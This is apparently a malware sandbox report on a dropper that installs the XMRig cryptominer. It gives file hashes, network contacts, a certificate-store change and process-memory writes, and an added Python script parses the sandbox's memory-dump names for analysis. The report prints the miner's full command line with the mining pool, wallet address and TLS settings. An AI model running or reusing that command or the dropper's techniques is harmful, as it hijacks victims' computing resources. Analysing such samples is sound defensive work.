| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1000-16-0x00000194F8770000-0x00000194F8790000-memory.dmp
memory/1000-17-0x00000194F8A10000-0x00000194F8A30000-memory.dmp
memory/1000-18-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-20-0x00000194FA300000-0x00000194FA320000-memory.dmp
memory/1000-19-0x00000194FA2E0000-0x00000194FA300000-memory.dmp
memory/1000-21-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-22-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-25-0x00000194FA300000-0x00000194FA320000-memory.dmp
memory/1000-24-0x00000194FA2E0000-0x00000194FA300000-memory.dmp
memory/1000-23-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-26-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-27-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-28-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-29-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-30-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-31-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-32-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-33-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-34-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-35-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-36-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-37-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-38-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-39-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-40-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-41-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-42-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-43-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-44-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-45-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-46-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-47-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-48-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-49-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-50-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-51-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-52-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-53-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-54-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-55-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-56-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-57-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-58-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-59-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-60-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-61-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-62-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-63-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-64-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-65-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-66-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-67-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-68-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-69-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-70-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-71-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-72-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-73-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-74-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-75-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-76-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-77-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-78-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-79-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-80-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-81-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-82-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-83-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-84-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2068 wrote to memory of 3472 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2068 wrote to memory of 3472 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 52.111.227.14:443 | | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3472-16-0x000001D721790000-0x000001D7217B0000-memory.dmp
memory/3472-17-0x000001D723180000-0x000001D7231A0000-memory.dmp
memory/3472-18-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-21-0x000001D7231C0000-0x000001D7231E0000-memory.dmp
memory/3472-20-0x000001D7231A0000-0x000001D7231C0000-memory.dmp
memory/3472-19-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-22-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-23-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-24-0x000001D7231A0000-0x000001D7231C0000-memory.dmp
memory/3472-25-0x000001D7231C0000-0x000001D7231E0000-memory.dmp
memory/3472-26-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-27-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-28-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-29-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-30-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-31-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-32-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-33-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-34-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-35-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-36-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-37-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-38-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-39-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-40-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-41-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-42-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-43-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-44-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-45-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-46-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-47-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-48-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-49-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-50-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-51-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-52-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-53-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-54-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-55-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-56-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-57-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-58-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-59-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-60-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-61-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-62-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-63-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-64-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-65-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-66-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-67-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-68-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-69-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-70-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-71-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-72-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-73-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-74-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-75-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-76-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-77-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-78-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-79-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-80-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-81-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-82-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-83-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-84-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
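The dump artifacts above are named by the sandbox as memory/<pid>-<index>-<start>-<end>-memory.dmp, and the same address range recurs across many indices because the sandbox snapshotted it repeatedly. The following is an added example, not part of the report or of the sandbox's own tooling: a Python script that parses those names, collapses repeated snapshots of one range into a single region with its size and snapshot list, and flags the range mapped near the top of x64 user space as the likely PE image. The regex is inferred from the naming visible on this page, the inline sample is a subset of the names copied from it, and the image-versus-heap threshold is a heuristic assumption, not documented sandbox behaviour.

```python
import re

# Assumed naming scheme, inferred from the artifact list on this page:
# memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

# Heuristic threshold (assumption): on 64-bit Windows 10 with high-entropy ASLR, PE images
# are typically mapped near the top of user space (0x7FF6... / 0x7FF7...), while heap and
# other private allocations land far lower.
IMAGE_RANGE_FLOOR = 0x7FF000000000

# Constructed sample: a subset of the dump names listed in this report, in report order.
SAMPLE_DUMPS = """\
memory/3472-16-0x000001D721790000-0x000001D7217B0000-memory.dmp
memory/3472-17-0x000001D723180000-0x000001D7231A0000-memory.dmp
memory/3472-18-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-21-0x000001D7231C0000-0x000001D7231E0000-memory.dmp
memory/3472-20-0x000001D7231A0000-0x000001D7231C0000-memory.dmp
memory/3472-19-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-22-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
memory/3472-24-0x000001D7231A0000-0x000001D7231C0000-memory.dmp
memory/3472-25-0x000001D7231C0000-0x000001D7231E0000-memory.dmp
memory/3472-84-0x00007FF695AF0000-0x00007FF6965F3000-memory.dmp
"""


def parse_dump_name(name):
    """Return {pid, idx, start, end} for one artifact name, or None if it does not match."""
    m = DUMP_RE.match(name.strip())
    if not m:
        return None
    return {
        "pid": int(m["pid"]),
        "idx": int(m["idx"]),
        "start": int(m["start"], 16),
        "end": int(m["end"], 16),
    }


def classify(start):
    """Heuristic label for a region based on where it sits in x64 user space (see threshold above)."""
    return "image-candidate" if start >= IMAGE_RANGE_FLOOR else "heap-or-private"


def summarize_regions(text):
    """Collapse dump names into unique (pid, start, end) regions, sorted by start address.

    Each region carries its byte size, the sorted snapshot indices that captured it,
    and the heuristic kind. Lines that do not match the naming scheme are ignored.
    """
    regions = {}
    for line in text.splitlines():
        d = parse_dump_name(line)
        if d is None:
            continue
        key = (d["pid"], d["start"], d["end"])
        entry = regions.setdefault(
            key,
            {
                "pid": d["pid"],
                "start": d["start"],
                "end": d["end"],
                "size": d["end"] - d["start"],
                "snapshots": [],
                "kind": classify(d["start"]),
            },
        )
        entry["snapshots"].append(d["idx"])
    out = sorted(regions.values(), key=lambda r: r["start"])
    for r in out:
        r["snapshots"].sort()
    return out


def largest_region(regions):
    """The region with the largest byte size; for a miner this is usually the unpacked image."""
    return max(regions, key=lambda r: r["size"]) if regions else None


def main():
    regions = summarize_regions(SAMPLE_DUMPS)
    for r in regions:
        print(
            f"pid={r['pid']} 0x{r['start']:016X}-0x{r['end']:016X} "
            f"size=0x{r['size']:X} ({r['size']:,} bytes) snapshots={r['snapshots']} {r['kind']}"
        )
    big = largest_region(regions)
    print(f"largest: 0x{big['start']:016X} size=0x{big['size']:X} kind={big['kind']}")


if __name__ == "__main__":
    main()
```

Run against the full list, the script shows that every entry for PID 3472 is one of five ranges: four 0x20000-byte allocations in the low 0x1D7... area and a single 0xB03000-byte (about 11 MB) range at 0x7FF695AF0000 that the sandbox re-dumped on almost every snapshot; that large, repeatedly captured image-range region is the one worth pulling first when hunting for the unpacked miner.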